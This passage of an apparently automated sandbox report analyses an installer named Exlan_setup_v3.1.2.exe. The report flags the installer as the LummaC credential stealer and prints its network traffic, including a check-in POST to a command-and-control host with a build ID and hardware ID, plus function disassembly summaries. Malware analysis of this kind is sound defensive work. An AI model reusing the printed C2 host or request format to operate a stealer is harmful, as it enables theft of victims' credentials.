2024-12-31 07:17:08 UTC	15331	OUT	Data Raw: ff d4 22 e4 03 f8 5d 15 2b 4c 25 56 4a 33 96 00 92 9e 84 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96 80 df 1e 9a 36 3a 50 10 fc e8 47 b3 37 8f 8c 04 aa c4 af Data Ascii: "]+L%VJ3Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\\|H36:PG7
2024-12-31 07:17:08 UTC	15331	OUT	Data Raw: ab e9 44 14 55 22 24 6f 59 19 49 63 1f 47 da 98 39 bd 9a ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93 95 a7 76 27 9e 4d 6a 3d 48 be c0 68 58 38 c1 6e d4 cd 93 Data Ascii: DU"$oYIcG9h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>Xv'Mj=HhX8n
2024-12-31 07:17:08 UTC	15331	OUT	Data Raw: 34 52 dc a0 7d 72 10 21 ee ee 1d a0 fa 42 97 d3 ef 2d 43 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b e7 68 7e 65 ad fd e4 4f bb 67 78 fa 2d 7f aa 1e 74 7b f5 Data Ascii: 4R}r!B-CIW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<h~eOgx-t{
2024-12-31 07:17:08 UTC	15331	OUT	Data Raw: e9 c5 4c de 84 4d f5 fd b9 38 b8 79 50 47 b8 cb 57 eb 34 c7 47 ca 68 bc cd c1 ab 9c 9c b3 e0 35 34 f2 42 75 a9 36 b9 aa 2c 09 1d 7b 40 75 c4 82 63 13 bc df d9 45 5e 6c f7 ce 9e 56 a6 db 43 6e b3 66 65 de 93 bf c7 4a 32 e0 55 81 9b d5 19 ae b9 10 6f 19 d1 8b 30 98 e3 82 3f cc 18 dc dc 8b 10 02 46 13 b9 50 1d 11 e8 bd 3e c3 47 1c 1c 57 b3 d9 81 3c 0f a5 37 44 fd af 4c da 22 83 02 6e 7b 4d 3a 15 dd 47 82 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe 89 b3 23 9c f0 5d a2 2c 2b 41 10 f1 67 7b 3a 50 d1 7e 86 24 d6 1a a4 06 6e 45 Data Ascii: LM8yPGW4Gh54Bu6,{@ucE^lVCnfeJ2Uo0?FP>GW<7DL"n{M:G2xqZ#M$^p2ab'R$(K2oUd1yQ<#],+Ag{:P~$nE
2024-12-31 07:17:08 UTC	15331	OUT	Data Raw: bd 64 7b 2b b1 42 b8 41 90 d2 e4 c6 f7 72 e2 6c e7 e4 d2 da 90 8d 5b c5 fc 3a b3 08 39 a7 3a 09 e1 a6 72 64 85 45 e3 e7 e5 1a 6c b5 7c a1 8b 3d a1 40 ee 59 54 21 a9 d1 c0 c0 57 e0 c7 c1 96 40 aa ba 72 ab b7 76 6d 02 14 ef bd ed f3 2c 4d 0b 19 58 b0 fd 6a 47 ad 88 b5 0c 23 00 b1 ab d6 19 a5 1c ae cf b1 ed e2 98 d2 2f 84 01 41 37 c6 ee f1 f5 dc 3f 72 77 6b d2 a9 5e b1 bb c8 d9 a3 2d 59 a8 44 25 da 50 cc 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40 32 ac 92 64 44 ef 53 53 9f d5 93 c7 84 c0 3e 3f aa 43 fa a7 98 e7 41 fe 55 8c Data Ascii: d{+BArl[:9:rdEl\|=@YT!W@rvm,MXjG#/A7?rwk^-YD%P~G#oMa[\|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@2dDSS>?CAU
2024-12-31 07:17:08 UTC	15331	OUT	Data Raw: 90 21 62 31 1b 89 3c 84 91 e5 6d 96 b5 0b 99 5e ff 59 4e 91 13 25 ef ea 7a ce 2a f9 ff da 2a 7e e2 64 11 f0 f5 ce e1 bc b8 2a 8f 37 fb da 02 e3 74 fb be 21 f1 ee dc b7 aa ac 61 89 26 d8 85 53 25 c8 48 41 90 87 0e ac 2e cd 48 4a e3 04 21 37 50 e7 36 53 90 ba 9b 0d 9b 28 77 b8 55 f5 50 f4 c7 45 40 58 f5 0e 02 b7 70 32 b3 99 13 1c a8 92 ff 6d d9 2b 1b 1f bd 64 c0 b5 3b cb 43 b2 5e a6 fe f5 af 8f 1f 21 7f ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b 51 0e bd 60 b1 46 08 5c dd 18 2d f9 58 23 3d 5a a9 d4 b7 59 09 53 1f 03 10 5d Data Ascii: !b1<m^YN%z*~d7t!a&S%HA.HJ!7P6S(wUPE@Xp2m+d;C^!{oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{LvskQ`F\-X#=ZYS]
2024-12-31 07:17:08 UTC	15331	OUT	Data Raw: b5 11 b3 ee 0e 92 a0 fb 0e f5 27 91 10 22 87 98 77 a2 1e 08 98 83 d7 0d e7 af 85 c2 84 e7 21 fa fc 89 8b 43 15 0e a3 79 e9 04 11 4d 86 42 ba e2 6b 72 82 a7 29 6c 5a 0f 97 49 75 51 b9 ef a6 6d 2e 86 61 60 02 d9 99 ef 57 fb 7f db d3 5a f4 32 7f 24 6c 02 9e 03 73 cf 51 b0 ec fc 99 f1 17 58 98 0f c7 bb 28 8d ed 1c 9f 98 73 65 db 0f 44 1a 10 b5 51 66 62 7d 45 37 ec 6b 5d 94 d2 e7 c6 53 cc 2e 28 5e 52 ca 30 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52 a0 47 0c 63 d8 28 bf a7 24 e0 9a d7 d2 e6 97 44 3c a9 d6 54 2e fd e7 75 da 59 Data Ascii: '"w!CyMBkr)lZIuQm.a`WZ2$lsQX(seDQfb}E7k]S.(^R0Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTURGc($D<T.uY
2024-12-31 07:17:08 UTC	15331	OUT	Data Raw: 7b a2 0a 35 2f 12 f7 f7 00 fa 60 26 42 4b 82 98 f9 b2 a0 ea f2 7e 00 ff cb 0b a2 0d 26 dd 2b 73 d6 5e 26 b6 90 b5 b1 5c 07 d4 77 4d 1e 81 ed 66 0e 33 52 e0 ea 6e 53 79 88 14 0f 07 21 cb 84 33 2c dd 47 93 e1 d7 64 5e 8c 5d 90 c4 12 a7 f8 3a 7e 25 f8 2d 08 b7 12 10 91 6e 7e 1e f3 0f 54 b8 73 7b 2a d4 3b 1d 3a 96 20 cb 6c 5c a7 89 e0 77 c9 c2 ef 00 ca 6d 28 29 76 eb e0 f3 10 22 fe 06 e3 62 b2 ed 6c 77 d1 b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa 3b e4 b7 07 f0 cd 26 e5 91 f9 f9 66 b7 e8 51 61 82 c2 4c ed 65 61 be 6f d5 9f Data Ascii: {5/`&BK~&+s^&\wMf3RnSy!3,Gd^]:~%-n~Ts{*;: l\wm()v"blw[FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/;&fQaLeao
2024-12-31 07:17:08 UTC	15331	OUT	Data Raw: 78 39 f3 f7 93 73 a1 ed fb 02 38 47 cd 56 bc 10 1b 80 7d b4 45 ba ff 3f 40 99 7d ae f5 a8 d0 18 a4 9b 33 36 f4 f6 3f dd 3e 0e 1b df 05 75 0b b2 f9 e7 aa ef 1f be 25 41 d8 6e 14 c0 ed 85 c8 fc 50 c6 9e e8 a1 d8 7c 23 3b 14 0c 87 d9 ee de 66 e9 cf 59 b7 7e 06 d7 87 f0 72 a7 b0 ec 82 ec a3 fb a5 99 b7 1a d4 6c 4e 23 6b 1b e3 be bf f4 cd f1 52 00 7b f0 9c 80 c8 aa c5 18 a9 93 4e be dc 0f cd ae 0e b2 b4 a2 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9 74 c5 fa 40 59 91 31 9d 37 ca 89 e1 de 52 cc 66 95 79 6f 57 c4 37 fd 56 a5 87 Data Ascii: x9s8GV}E?@}36?>u%AnP\|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y17RfyoW7V
2024-12-31 07:17:09 UTC	1137	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:17:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u1i6gh96n4ndg7ts7p2cjnnt3h; expires=Sat, 26 Apr 2025 01:03:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z7dloTADmryaEYPPALhwlQnwuDmeQPtZy2ISKGO%2BJwhbpjPISK%2FECLaTbNGx9pLiUxMA1XRM90xNDTJV7%2BGGcgFwuWst%2FR3yZ0F9oaJ%2Fw5ADPQBP%2Bz8jhqEq9ZE6EGnXNbU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa87cf6a91e424a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2219&min_rtt=2219&rtt_var=1109&sent=198&recv=590&lost=0&retrans=1&sent_bytes=4210&recv_bytes=572921&delivery_rate=238796&cwnd=252&unsent_bytes=0&cid=11275c85c04a7f5e&ts=1523&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	172.67.157.254	443	7584	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:17:10 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 79 Host: lev-tolstoi.com
2024-12-31 07:17:10 UTC	79	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 6e 39 26 6a 3d 26 68 77 69 64 3d 46 45 32 43 31 34 41 38 44 44 33 36 43 42 35 45 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 Data Ascii: act=get_message&ver=4.0&lid=Dvh8ui--n9&j=&hwid=FE2C14A8DD36CB5E37CB803551D62973
2024-12-31 07:17:10 UTC	1123	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:17:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9t723r3l574j87rv9djejgpvdl; expires=Sat, 26 Apr 2025 01:03:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3OQ%2BVB2cZcQTPbrcDfva61sVdSLd4SqVR6%2FbCRK4WrjmZ4vOTJu2wlxYprrvnJWAjmrEKq7PQvgXdGWXHFsXyyTucKipnB4TLdwbB2HizoULXrp9TaxPFX%2Bm7PCMnxjsMHk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa87d032ab28c78-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1927&min_rtt=1918&rtt_var=737&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=978&delivery_rate=1465863&cwnd=236&unsent_bytes=0&cid=69ba09df1119f3f3&ts=463&x=0"
2024-12-31 07:17:10 UTC	230	IN	Data Raw: 65 30 0d 0a 58 66 64 69 7a 53 52 38 52 2b 4d 5a 50 32 36 42 50 47 70 47 68 38 55 58 70 4e 43 6b 36 5a 50 61 45 55 4d 39 4d 64 48 58 48 6c 55 47 6a 45 43 34 42 6b 5a 6c 69 32 31 4c 48 76 49 47 4e 6d 6e 62 36 6e 54 4e 73 63 69 41 34 4f 67 6e 62 55 68 43 6a 66 68 34 50 44 47 53 50 75 4a 4b 46 54 2b 51 62 46 73 42 34 6b 34 54 4e 76 50 72 63 74 79 31 68 73 57 78 76 47 56 68 42 77 48 39 39 58 74 33 5a 38 63 66 34 56 39 65 4d 73 45 6a 48 51 62 31 53 42 6f 31 76 5a 6b 34 2b 50 2f 48 67 50 4b 32 65 44 41 50 42 2f 2b 69 62 51 6c 79 6b 51 75 68 51 53 42 6f 6a 58 42 48 48 66 52 59 42 53 58 31 76 47 66 51 2f 73 47 52 39 76 67 39 59 56 74 46 38 2b 30 75 65 58 2b 53 51 50 63 55 41 52 6f 3d 0d 0a Data Ascii: e0XfdizSR8R+MZP26BPGpGh8UXpNCk6ZPaEUM9MdHXHlUGjEC4BkZli21LHvIGNmnb6nTNsciA4OgnbUhCjfh4PDGSPuJKFT+QbFsB4k4TNvPrcty1hsWxvGVhBwH99Xt3Z8cf4V9eMsEjHQb1SBo1vZk4+P/HgPK2eDAPB/+ibQlykQuhQSBojXBHHfRYBSX1vGfQ/sGR9vg9YVtF8+0ueX+SQPcUARo=
2024-12-31 07:17:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:16:55
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe"
Imagebase:	0x980000
File size:	5'136'896 bytes
MD5 hash:	F86E00A8BF2EDC5379395D27F517A170
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1694937344.0000000006110000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1690736705.0000000004273000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:16:56
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe"
Imagebase:	0x8d0000
File size:	5'136'896 bytes
MD5 hash:	F86E00A8BF2EDC5379395D27F517A170
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	1.7%
Signature Coverage:	7.4%
Total number of Nodes:	929
Total number of Limit Nodes:	35

Executed Functions

Function 6CFCB6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CFCB73F
VariantInit.OLEAUT32(?), ref: 6CFCB748
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFCB7BE
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFCB7F5
VariantClear.OLEAUT32(?), ref: 6CFCB801

Part of subcall function 6CFCC850: VariantInit.OLEAUT32(?), ref: 6CFCC88F
Part of subcall function 6CFCC850: VariantInit.OLEAUT32(?), ref: 6CFCC895
Part of subcall function 6CFCC850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFCC8A0
Part of subcall function 6CFCC850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CFCC8D5
Part of subcall function 6CFCC850: VariantClear.OLEAUT32(?), ref: 6CFCC8E1

VariantClear.OLEAUT32(?), ref: 6CFCBA15
SafeArrayDestroy.OLEAUT32(?), ref: 6CFCBE90
VariantClear.OLEAUT32(?), ref: 6CFCBEA3
VariantClear.OLEAUT32(?), ref: 6CFCBEA9

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 9fdd0a163157c6acee0a9462273af7d17eddd930e4bc414607c41839d1546d93
Instruction ID: d773a1956b707560b39010200b7eae28b026ee65403432bea68e4b084ae23dc2
Opcode Fuzzy Hash: 9fdd0a163157c6acee0a9462273af7d17eddd930e4bc414607c41839d1546d93
Instruction Fuzzy Hash: 4F527D75A01219DFDB10DFA8C880BEEBBB5FF49304F248599E909AB741DB30A945CF91

Function 6CFBB6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,5A45ABCE), ref: 6CFBB711
LoadLibraryW.KERNEL32(mscoree.dll), ref: 6CFBB71C
GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6CFBB730
__cftoe.LIBCMT ref: 6CFBB870
GetModuleHandleW.KERNEL32(?), ref: 6CFBB88B
GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6CFBB8D7

Strings

v4.0.30319, xrefs: 6CFBB767
CLRCreateInstance, xrefs: 6CFBB72A
mscoree.dll, xrefs: 6CFBB70C, 6CFBB717

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad__cftoe
String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
API String ID: 1275574042-506955582
Opcode ID: 7659e43c7c57d683139b3b2dc0b66b071fb5758e8fabc961d66799c63e0cdd80
Instruction ID: 0aa857a7005a1c2ffa251cb92f18d60133ff5c977cccfb5d13fe91e5dc9f774c
Opcode Fuzzy Hash: 7659e43c7c57d683139b3b2dc0b66b071fb5758e8fabc961d66799c63e0cdd80
Instruction Fuzzy Hash: EB918A70D052499FDB04DFE9C8C09AEBBB4FF49314F208A6CE129EB691D730A946CB54

Function 6CFFDBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,5A45ABCE,6D028180,00000000,?), ref: 6CFFDBFB
GetLastError.KERNEL32 ref: 6CFFDC01
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6CFFDC15
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6CFFDC26
SetLastError.KERNEL32(00000000), ref: 6CFFDC2D

Part of subcall function 6CFFD9D0: GetLastError.KERNEL32(00000010,5A45ABCE,75A8FC30,?,00000000), ref: 6CFFDA1A

__CxxThrowException@8.LIBCMT ref: 6CFFDC78

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

Strings

CryptAcquireContext, xrefs: 6CFFDC35
Crypto++ RNG, xrefs: 6CFFDC0D, 6CFFDC20

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
String ID: CryptAcquireContext$Crypto++ RNG
API String ID: 3279666080-1159690233
Opcode ID: 00b152902d7f2a383b36990c7be29a9289c56e20a1ce554099670ccb35f0c153
Instruction ID: 1d2748cb78e96b916d7717cd03ae504525c077432899c73244da1123c84da515
Opcode Fuzzy Hash: 00b152902d7f2a383b36990c7be29a9289c56e20a1ce554099670ccb35f0c153
Instruction Fuzzy Hash: D1219F71248301ABE310EB64CC45F6BBBE8EB99744F100A1DF645976C1EBB5A0448BA2

Function 05800BE2 Relevance: 11.8, Strings: 9, Instructions: 536COMMON

Download Yara Rule

Strings

Gvq, xrefs: 05800EF3
Gvq, xrefs: 05801438
p<^q, xrefs: 05800CEB
Gvq, xrefs: 05800D8A
Gvq, xrefs: 0580102F
Gvq, xrefs: 05801169
p<^q, xrefs: 05800D1E
p<^q, xrefs: 05800CF7
p<^q, xrefs: 05800D12

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
